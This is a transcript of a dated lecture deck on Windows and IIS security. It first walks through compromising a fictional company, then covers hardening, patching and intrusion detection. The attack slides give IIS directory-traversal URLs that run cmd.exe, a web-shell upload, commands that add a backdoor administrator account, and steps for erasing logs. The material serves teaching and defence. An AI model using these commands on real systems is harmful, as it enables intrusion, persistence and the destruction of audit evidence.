Windows Security Analysis - PowerPoint PPT Presentation

1 / 67
About This Presentation
Title:

Windows Security Analysis

Description:

'Hacker' used primarily by the media to describe malicious ... Erase logs from hard disc. Erasing Eventlog harder. IDS Systems. Network Monitoring at firewall ... – PowerPoint PPT presentation

Number of Views:232
Avg rating:3.0/5.0
Slides: 68
Provided by: mattcookht
Category:

less

Transcript and Presenter's Notes

Title: Windows Security Analysis


1
Windows Security AnalysisComputer Science
E-Commerce Security Matthew Cookhttp//escarpment
.net/
2
Introduction
  • Loughborough University
  • http//www.lboro.ac.uk/computing/
  • Janet Web Cache Service
  • http//wwwcache.ja.net/

3
Windows Security Analysis
  • Introduction
  • Step-by-step Machine Compromise
  • Preventing Attack
  • Further Reading
  • The Future

4
Introduction
  • Physical Security
  • Security Threats
  • Hacker or Cracker
  • The Easiest Security Improvement
  • Can you buy security?

5
Physical Security
  • Secure Location
  • BIOS restrictions
  • Password Protection
  • Boot Devices
  • Case Locks
  • Case Panels

6
Security Threats
  • Denial of Service
  • Theft of information
  • Modification
  • Fabrication (Spoofing or Masquerading)

7
Security Threats
  • Why a compromise can occur
  • Physical Security Holes
  • Software Security Holes
  • Incompatible Usage Security Holes
  • Social Engineering
  • Complacency

8
Hacker or Cracker
  • Hacker used primarily by the media to describe
    malicious attacks by individuals
  • However the computing community uses Cracker to
    mean the same
  • A Hacker tinkers with systems for good
    purposes. (Not breaking the law)
  • To avoid confusion many people now sayA machine
    has been compromised!Not A machine has been
    hacked!

9
The Easiest Security Improvement
  • Good passwords
  • Usernames and Passwords are the primary security
    defence
  • Use a password that is easy to type to avoid
    Shoulder Surfers
  • Use the first letters from song titles, song
    lyrics or film quotations

10
Can you buy Security?
  • This system is secure. A product vendor might
    say This product makes your network secure.
    Or We secure e-commerce. Inevitably, these
    claims are naïve and simplistic. They look at the
    security of the product, rather than the security
    of the system. The first questions to ask are
    Secure from whom? and Secure against what?
  • Bruce Schneier

11
Step-by-step Machine Compromise
  • Background
  • Gathering Information
  • Identifying System Weakness
  • Exploiting the Security Hole
  • Gaining Root
  • Backdoor Access
  • System Alteration
  • Audit Trail Removal

12
Background
  • Reasons for Attack
  • Personal Issues
  • Political Statement
  • Financial Gain (Theft of money, information)
  • Learning Experience
  • DoS (Denial of Service)
  • Support for Illegal Activity
  • In our scenario we are going to attack the
    company laggyband.com

13
Gathering Information
  • Companies House
  • Internet SearchURL http//www.google.co.uk
  • WhoisURL http//www.netsol.com/cgi-bin/whois/who
    is
  • A Whois query can provide
  • The Registrant
  • The Domain Names Registered
  • The Administrative, Technical and Billing Contact
  • Record updated and created date stamps
  • DNS Servers for the Domain

14
Gathering Information
  • Use Nslookup or dig
  • dig _at_dns.laggyband.com www.laggyband.com
  • Different query type available
  • A Network address
  • Any All or Any Information available
  • Mx Mail exchange records
  • Soa Zone of Authority
  • Hinfo Host information
  • Axfr Zone Transfer
  • Txt Additional strings

15
Identifying System Weakness
  • Many products available
  • Nmap
  • Nessus
  • Pandora
  • Pwdump
  • L0pht Crack
  • Null Authentication

16
Nmap
  • Port Scanning Tool
  • Stealth scanning, OS Fingerprinting
  • Open Source
  • Runs under Unix based OS
  • Port development for Win32
  • URL http//www.insure.org/nmap/

17
Nmap
18
Nessus
  • Remote security scanner similar to Typhon
  • Very comprehensive
  • Frequently updated modules
  • Testing of DoS attacks
  • Open Source
  • Win32 and Java Client
  • URL http//nessus.org/

19
Pandora
  • Not strictly Windows Security
  • Runs on either Unix or Win32
  • Excellent tool to evaluate Netware security
  • Open Source
  • Lots of additional information
  • URL http//www.nmrc.org/pandora/

20
pwdump
  • Version 3 (e encrypted)
  • Developed by Phil Staubs and Erik Hjelmstad
  • Based on pwdump and pwdump2
  • URL http//www.ebiz-tech.com/html/pwdump.html
  • Needs Administrative Privilidges
  • Extracts hashs even if syskey is installed
  • Extract from remote machines
  • Identifies accounts with no password
  • Self contained utility

21
L0pht Crack
  • Password Auditing and Recovery
  • Crack Passwords from many sources
  • Registration 249
  • URL http//www.atstake.com/research/lc3/

22
L0pht Crack
  • Crack Passwords from
  • Local Machine
  • Remote Machine
  • SAM File
  • SMB Sniffer
  • PWDump file

23
Nmap Analysis
  • nmap sP 158.125.0.0/16
  • Dependant on ICMP (Internet Control Message
    Protocol)
  • nmap sP PT80 158.125.0.0/16
  • Dependant on TCP SYN/ACK packet

24
Nmap Analysis
  • TCP Connect Scan
  • Completes a Three Way Handshake
  • Very noisy (Detection by IDS)

25
Nmap Analysis
  • TCP SYN Scan
  • Half open scanning (Full port TCP connection not
    made)
  • Less noisy than the TCP Connect Scan

26
Nmap Analysis
  • TCP FIN Scan
  • FIN Packet sent to target port
  • RST returned for all closed ports
  • Mostly works UNIX based TCP/IP Stacks
  • TCP Xmas Tree Scan
  • Sends a FIN, URG and PUSH packet
  • RST returned for all closed ports
  • TCP Null Scan
  • Turns off all flags
  • RST returned for all closed ports
  • UDP Scan
  • UDP Packet sent to target port
  • ICMP Port Unreachable for closed ports

27
Null Authentication
  • Null Authentication
  • Net use \\camford\IPC /u
  • Famous tools like Red Button
  • Net view \\camford
  • List of Users, groups and shares
  • Last logged on date
  • Last password change
  • Much more

28
Exploiting the Security Hole
  • Using IIS Unicode/Directory Traversal
  • /scripts/../../winnt/system32/cmd.exe /cdir
  • /scripts/..c0af../winnt/system32/cmd.exe?/cdir
  • Displays the listing of c in browser
  • Copy cmd.exe to /scripts/root.exe
  • Echo upload.asp
  • GET /scripts/root.exe /cechoblahgtupload.asp
  • Upload cmdasp.asp using upload.asp
  • Still vulnerable on 24 of E-Commerce servers

29
Gaining Root
  • Cmdasp.asp provides a cmd shell in the SYSTEM
    context
  • Increase in privileges is now simple
  • ISAPI.dll RevertToSelf (Horovitz)
  • Version 2 coded by Foundstone
  • http//camford/scripts/idq.dll?
  • Patch Bulletin MS01-26
  • NOT included in Windows 2000 SP2

30
Backdoor Access
  • Create several user accounts
  • Net user iisservice ltpassgt /ADD
  • Net localgroup administrators iisservice /ADD
  • Add root shells on high end ports
  • Tiri is 3Kb in size
  • Add backdoors to Run registry keys

31
System Alteration
  • Web page alteration
  • Information Theft
  • Enable services
  • Add VNC
  • Creating a Warez Server
  • Net start msftpsvc
  • Check access
  • Upload file 1Mb in size
  • Advertise as a warez server

32
Audit Trail Removal
  • Many machines have auditing disabled
  • Main problems are IIS logs
  • DoS IIS before logs sync to disc
  • Erase logs from hard disc
  • Erasing Eventlog harder
  • IDS Systems
  • Network Monitoring at firewall

33
Preventing Attack
  • NetBIOS/SMB Services
  • Hfnetchk and Qchain
  • SNMP Vulnerabilities
  • Active Directory Vulnerabilities
  • IPSec
  • IIS Security
  • IDS Snort
  • .NET Server

34
NetBIOS/SMB Services
  • NetBIOS Browsing Request UDP 137
  • NetBIOS Browsing Response UDP 138
  • NetBIOS Communications TCP 135
  • CIFS TCP 139, 445 UDP 445
  • Port 445 Windows 2000 only
  • Block ports at firewall
  • Netstat -A

35
NetBIOS/SMB Services
  • To disable NetBIOS
  • Select Disable NetBIOS in the WINS tab of
    advanced TCP/IP properties.
  • Deselect File and Print sharing in the advanced
    settings of the Network and Dial-up connections
    window

36
NetBIOS/SMB Services
  • Disable Null Authentication
  • Key similar to Windows NT 4.0
  • HKLM\SYSTEM\CurrentControlSet\Control\LSA\Restrict
    Anonymous
  • REG_DWORD set to 0, 1 or 2!
  • HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeSe
    rvers\RestrictAnonymous
  • REG_DWORD set to 0 or 1

37
Hfnetchk
  • Use Hfnetchk to check hot fixes
  • Checks machines against Microsoft XML
  • Automate the process using a batch files and a
    mail client (Postie)
  • URL http//www.infradig.com/infradig/postie/
  • Use QChain to chain hot fixes together without
    rebooting in-between.

38
Hfnetchk
  • Patch details for
  • Windows NT 4.0, 2000, XP, .NET server
  • IIS 4, IIS 5 and IIS 6
  • SQL Server 7.0
  • SQL Server 2000
  • Internet Explorer 5.01 (and later)

39
Hfnetchk
  • Default scan of local host (Pre
    downloaded)hfnetchk x mssecure.xml
  • Default scan of lboro domainhfnetchk d lboro
  • Verbose scan of local hosthfnetchk v x
    mssecure.xml
  • Verbose scan including installed hot
    fixeshfnetchk v a b x mssecure.xml

40
SNMP Vulnerabilities
  • Simple Network Management Protocol
  • Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25
  • SNMP Utilities in Resource Kit
  • Turn off SNMP services
  • Set community names
  • Set accepted hosts

41
SNMP Vulnerabilities
42
SNMP Vulnerabilities
  • CERT Advisory Tuesday 12th February
  • Privilege Escalation, DoS, Instability
  • Block UDP 161 and 162 at firewall
  • Patch or disable SNMP
  • Patches available for Windows 2000 and XP
  • URL http//www.microsoft.com/technet/treeview/def
    ault.asp?url/technet/security/bulletin/ms02-006.a
    sp

43
AD Vulnerabilities
  • Listing of AD contents using ldp.exe
  • Ldp is contained on the Resource Kit
  • Authenticated connection needed
  • Filter TCP 389 (LDAP) and 3268 (GC)
  • DNS Securing Zone Transfers to Slave Name
    servers only

44
IPSec
  • IP security
  • Linux Connectivity using FreeS/WAN
  • Mainly for wireless use
  • WEP encryption cracked
  • URL http//www.freeswan.org/
  • URL http//airsnort.sourceforge.net/

45
IIS Security
  • History
  • Recent Worms
  • IIS Lock Down Tool
  • URL Scan
  • The Future

46
IIS History
  • IIS 2.0 Installed by NT 4.0
  • IIS 3.0 followed by more common IIS 4.0
  • Quickly gained reputation for (in)security
  • IIS 5.0 Installed by Windows 2000
  • IIS 6.0 Installed by .NET Server
  • Microsoft releases Hfnetchk
  • Closely followed by IIS Lockdown and URLScan

47
Recent Worms
  • Sadmind/IISDirectory Traversal (Unicode Exploit)
  • CodeRedida/idq buffer overflow
  • CodeGreen ida/idq buffer overflow
  • NimdaDirectory Traversal (Unicode Exploit)

48
Sadmind/IIS
  • 2001-05-03 223449 203.67.x.x - 158.125.x.x 80
    GET /scripts/root.exe /cecholthtmlgtltbodybgcol
    or3Dblackgtltbrgtltbrgtltbrgtltbrgtltbrgtltbrgtlt
    tablewidth3D100gtlttdgtltpalign3D22center22
    gtltfontsize3D7color3DredgtfUSAGovernment
    lt/fontgtlttrgtlttdgtltpalign3D22center22gtltf
    ontsize3D7color3DredgtfPoizonBOxlttrgtlttd
    gtltpalign3D22center22gtltfontsize3D4color
    3Dredgtcontactsysadmcn_at_yahoo.com.cnlt/htmlgtgt../w
    wwroot/default.htm 200 -

49
IIS Lock Down Tool
  • Automatic Lock Down Now 2nd version
  • Locks down IIS 4.0 and IIS 5.0
  • Express lock down for simple web sites
  • Custom lock down for more complex servers
  • Undo facility to reverse last lock down
  • URL http//www.microsoft.com/Downloads\Release.as
    p?ReleaseID32362

50
IIS Lock Down Tool
  • Disable
  • Active Server Pages
  • Index Server Interface
  • Server Side Includes
  • Internet Data Connector
  • Internet Printing
  • HTR Scripting
  • Remove
  • Sample Web Files
  • Script Virtual Directory
  • MSADC Directory
  • WebDAV
  • Set Permissions on
  • Exe files
  • Content Directories

51
URL Scan
  • ISAPI filter scans incoming HTTP requests
  • Filtered based on rule set
  • New rules easily added
  • Default urlscan.ini suitable for static pages
  • Restart service when changes made
  • 404 and logged request for matched rules
  • URL http//www.microsoft.com/Downloads\Release.as
    p?ReleaseID32571

52
URL Scan
  • Filter on
  • The request method (verb)
  • File Extension
  • URL Encoding
  • Non ASCII characters
  • Malicious character sequence
  • Headers in HTTP GET

53
The Future
  • Gartner report recommends ditching IIS
  • Rewrite of IIS on the cards for version 6
  • Lock Down Tool (Interim Measures)
  • Httpd functionality in the kernel (TechEd)
  • IIS Lockdown included in SP3
  • Further implications for .NET

54
IDS Snort
  • IDS Intrusion Detection System
  • Libpcap packet sniffer and logger
  • Originally developed for the Unix platforms
  • Open Source
  • Port to Win32 available (Release 1.8.1)
  • Installation on Win32 in under 30 minutes
  • Run on your IIS server or standalone

55
IDS Snort
  • Snort can detect
  • Stealth Port Scans
  • CGI Attacks
  • Front Page Extensions Attacks
  • ICMP Activity
  • SMTP Activity
  • SQL Activity
  • SMB Probes

56
IDS Snort
  • Default logging to snort\logs\alert.ids
  • Log to mySQL and SQL Server
  • Notification as logs, winpopup, email etc
  • SnortSnaf or ACID (PHP Based)
  • GUI IDS Center
  • URL http//snort.sourcefire.com/
  • URL http//www.cert.org/kb/acid/
  • URL http//www.silicondefense.com/

57
Snort
58
.NET Server
59
.NET Server
60
.NET Server
  • Mainly improvements in AD and Management
  • Blank passwords at console only
  • Improved command line tools
  • Evaluating Security on build 3590
  • IIS Currently secure from install
  • Auditing enabled by default
  • Integrated change log
  • XML Output

61
.NET Server
62
.NET Server
63
.NET Server
64
.NET Server
65
.NET Server
66
Further Reading
  • Schneier, B Secrets Lies (Digital Security in
    a Networked World) ISBN 0471253111
  • Hacking Exposed Series McGraw Hill
  • Security Focus
  • Bugtraq
  • Google

67
Questions
Write a Comment
User Comments (0)
About PowerShow.com